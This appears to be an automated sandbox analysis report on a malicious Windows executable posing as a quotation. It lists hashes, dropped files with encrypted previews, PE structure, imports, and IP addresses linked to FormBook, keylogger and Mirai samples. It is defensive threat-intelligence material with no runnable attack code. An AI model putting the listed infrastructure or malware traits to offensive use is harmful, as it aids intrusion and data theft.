                                                                    IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 206.238.89.119
                                                                    need quotations.exeGet hashmaliciousFormBookBrowse
                                                                    • 206.238.89.119

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUSVoicemail_+Transcription001799.docxGet hashmaliciousUnknownBrowse
                                                                    • 104.21.96.1
                                                                    REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    http://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                                    • 104.21.43.239
                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                    • 172.67.187.200
                                                                    16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    https://skillbridge.ca/onlinePaymentverify.htmlGet hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41
                                                                    COGENT-174USmain_x86.elfGet hashmaliciousMiraiBrowse
                                                                    • 38.151.83.123
                                                                    main_sh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 38.173.225.205
                                                                    bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                    • 38.230.130.96
                                                                    MGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                                    • 38.47.232.196
                                                                    lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                    • 206.238.89.119
                                                                    s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                                                    • 38.47.232.196
                                                                    f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                    • 38.224.37.24
                                                                    https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                                                                    • 38.91.45.7
                                                                    VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                    • 114.114.114.114
                                                                    New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                    • 38.47.232.202
                                                                    CLOUDFLARENETUSVoicemail_+Transcription001799.docxGet hashmaliciousUnknownBrowse
                                                                    • 104.21.96.1
                                                                    REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 104.26.13.205
                                                                    fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 172.67.177.134
                                                                    http://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                                    • 104.21.43.239
                                                                    hesaphareketi-01.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Hesap hareketleriniz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    Fiyat Teklifi_2038900001-MOKAPTO-06122024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.67.152
                                                                    NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                                                    • 172.67.187.200
                                                                    16547.jsGet hashmaliciousMassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    https://skillbridge.ca/onlinePaymentverify.htmlGet hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Temp\2-64-111

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\comp.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1239949490932863
                                                                    Encrypted:false
                                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                    MD5:271D5F995996735B01672CF227C81C17
                                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\aut4700.tmp

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\QUOTATON-37839993.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.993202233484396
                                                                    Encrypted:true
                                                                    SSDEEP:6144:n4gJDE1tfS5rZQZVYbZPPW9mKjRFkd9XaitzgMMDZfRNh:n4gRaS/QbWH29zaailghDZfRNh
                                                                    MD5:5B4B2BB58E9C4179451ED42F457131F3
                                                                    SHA1:B0DD7B1E360580C015161815B07F3A33E23665EE
                                                                    SHA-256:8B41605695AACB561921B45249EFF8BE33E9967CC8F83ADA7455B91A91CBD3F7
                                                                    SHA-512:F13936641C9565AFB4C6B176B91C47D2A7427BF2527A81BDFACBB18C1C3381B631750969ED78365EA99046EAFA2204E593EC9466A1989282EC5D1984D3E63263
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...PIG66ECFQ..IJ.JG66ACF.ROIJPJG66ACFQROIJPJG66ACFQROIJPJG66.CFQ\P.DP.N...B..s.!##j7DY&1'<r,($>%3.T$c4$<o $p..e.,,"4|BD@tJG66ACF(SF.w0-..V&.{15.S...}VQ.Y...s)-.P..}#!..&*"m* .6ACFQROI..JGz7@CVJK.IJPJG66A.FSSDHAPJ.26ACFQROIJ.^G66QCFQ"KIJP.G6&ACFSROOJPJG66AEFQROIJPJ726AAFQROIJRJ..6ASFQBOIJPZG6&ACFQROYJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJ~>"NBACF..KIJ@JG6bECFAROIJPJG66ACFQRoIJ0JG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQ

                                                                    C:\Users\user\AppData\Local\Temp\slashing

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\QUOTATON-37839993.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.993202233484396
                                                                    Encrypted:true
                                                                    SSDEEP:6144:n4gJDE1tfS5rZQZVYbZPPW9mKjRFkd9XaitzgMMDZfRNh:n4gRaS/QbWH29zaailghDZfRNh
                                                                    MD5:5B4B2BB58E9C4179451ED42F457131F3
                                                                    SHA1:B0DD7B1E360580C015161815B07F3A33E23665EE
                                                                    SHA-256:8B41605695AACB561921B45249EFF8BE33E9967CC8F83ADA7455B91A91CBD3F7
                                                                    SHA-512:F13936641C9565AFB4C6B176B91C47D2A7427BF2527A81BDFACBB18C1C3381B631750969ED78365EA99046EAFA2204E593EC9466A1989282EC5D1984D3E63263
                                                                    Malicious:false
                                                                    Preview:...PIG66ECFQ..IJ.JG66ACF.ROIJPJG66ACFQROIJPJG66ACFQROIJPJG66.CFQ\P.DP.N...B..s.!##j7DY&1'<r,($>%3.T$c4$<o $p..e.,,"4|BD@tJG66ACF(SF.w0-..V&.{15.S...}VQ.Y...s)-.P..}#!..&*"m* .6ACFQROI..JGz7@CVJK.IJPJG66A.FSSDHAPJ.26ACFQROIJ.^G66QCFQ"KIJP.G6&ACFSROOJPJG66AEFQROIJPJ726AAFQROIJRJ..6ASFQBOIJPZG6&ACFQROYJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJ~>"NBACF..KIJ@JG6bECFAROIJPJG66ACFQRoIJ0JG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQ

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.208004252249633
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:QUOTATON-37839993.exe
                                                                    File size:1'226'240 bytes
                                                                    MD5:4fff9ad3ccf6625dc0287e4ba41f0184
                                                                    SHA1:a3b82d53b251831f76e70c02c7ecf7b33741650f
                                                                    SHA256:f001831d4c2b9ff4970e74f952942525cd7a14578f64e39f7a360b94a9f84a73
                                                                    SHA512:f1913dc79250a315abb944af843bf05a3de6861839c520ce0d4266f546d0205e38fb121a7385e90f9e8d62884355ebafefd2342c9453deb51b7a56e3633e952e
                                                                    SSDEEP:24576:Iu6J33O0c+JY5UZ+XC0kGso6Fa1lR302ZuUt6zWY:iu0c++OCvkGs9Fa1lR35gUtNY
                                                                    TLSH:FB45CF2273DEC360CB669173BF69B7057EBF38214A30B95B2F980D7DA950161162C7A3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                    File Icon

                                                                    Icon Hash:aaf3e3e3938382a0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x427dcd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6752356F [Thu Dec 5 23:21:19 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    call 00007F91ED26352Ah
                                                                    jmp 00007F91ED2562F4h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [esp+10h]
                                                                    mov ecx, dword ptr [esp+14h]
                                                                    mov edi, dword ptr [esp+0Ch]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007F91ED25647Ah
                                                                    cmp edi, eax
                                                                    jc 00007F91ED2567DEh
                                                                    bt dword ptr [004C31FCh], 01h
                                                                    jnc 00007F91ED256479h
                                                                    rep movsb
                                                                    jmp 00007F91ED25678Ch
                                                                    cmp ecx, 00000080h
                                                                    jc 00007F91ED256644h
                                                                    mov eax, edi
                                                                    xor eax, esi
                                                                    test eax, 0000000Fh
                                                                    jne 00007F91ED256480h
                                                                    bt dword ptr [004BE324h], 01h
                                                                    jc 00007F91ED256950h
                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                    jnc 00007F91ED25661Dh
                                                                    test edi, 00000003h
                                                                    jne 00007F91ED25662Eh
                                                                    test esi, 00000003h
                                                                    jne 00007F91ED25660Dh
                                                                    bt edi, 02h
                                                                    jnc 00007F91ED25647Fh
                                                                    mov eax, dword ptr [esi]
                                                                    sub ecx, 04h
                                                                    lea esi, dword ptr [esi+04h]
                                                                    mov dword ptr [edi], eax
                                                                    lea edi, dword ptr [edi+04h]
                                                                    bt edi, 03h
                                                                    jnc 00007F91ED256483h
                                                                    movq xmm1, qword ptr [esi]
                                                                    sub ecx, 08h
                                                                    lea esi, dword ptr [esi+08h]
                                                                    movq qword ptr [edi], xmm1
                                                                    lea edi, dword ptr [edi+08h]
                                                                    test esi, 00000007h
                                                                    je 00007F91ED2564D5h
                                                                    bt esi, 03h
                                                                    jnc 00007F91ED256528h

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ASM] VS2013 build 21005
                                                                    • [ C ] VS2013 build 21005
                                                                    • [C++] VS2013 build 21005
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [ASM] VS2013 UPD4 build 31101
                                                                    • [RES] VS2013 build 21005
                                                                    • [LNK] VS2013 UPD4 build 31101

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x62c54.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x711c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xc70000x62c540x62e00ed536a326b6ebf20e00d30320c5f795dFalse0.9331320124841972data7.906365126858876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x12a0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                    RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                    RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                    RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                    RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                    RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                    RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                    RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                    RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                    RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                    RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                    RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                    RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                    RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                    RT_RCDATA0xcf7b80x59f1bdata1.0003284375330812
                                                                    RT_GROUP_ICON0x1296d40x76dataEnglishGreat Britain0.6610169491525424
                                                                    RT_GROUP_ICON0x12974c0x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x1297600x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0x1297740x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0x1297880xdcdataEnglishGreat Britain0.6181818181818182
                                                                    RT_MANIFEST0x1298640x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                    Imports

                                                                    DLLImport
                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                    UxTheme.dllIsThemeActive
                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
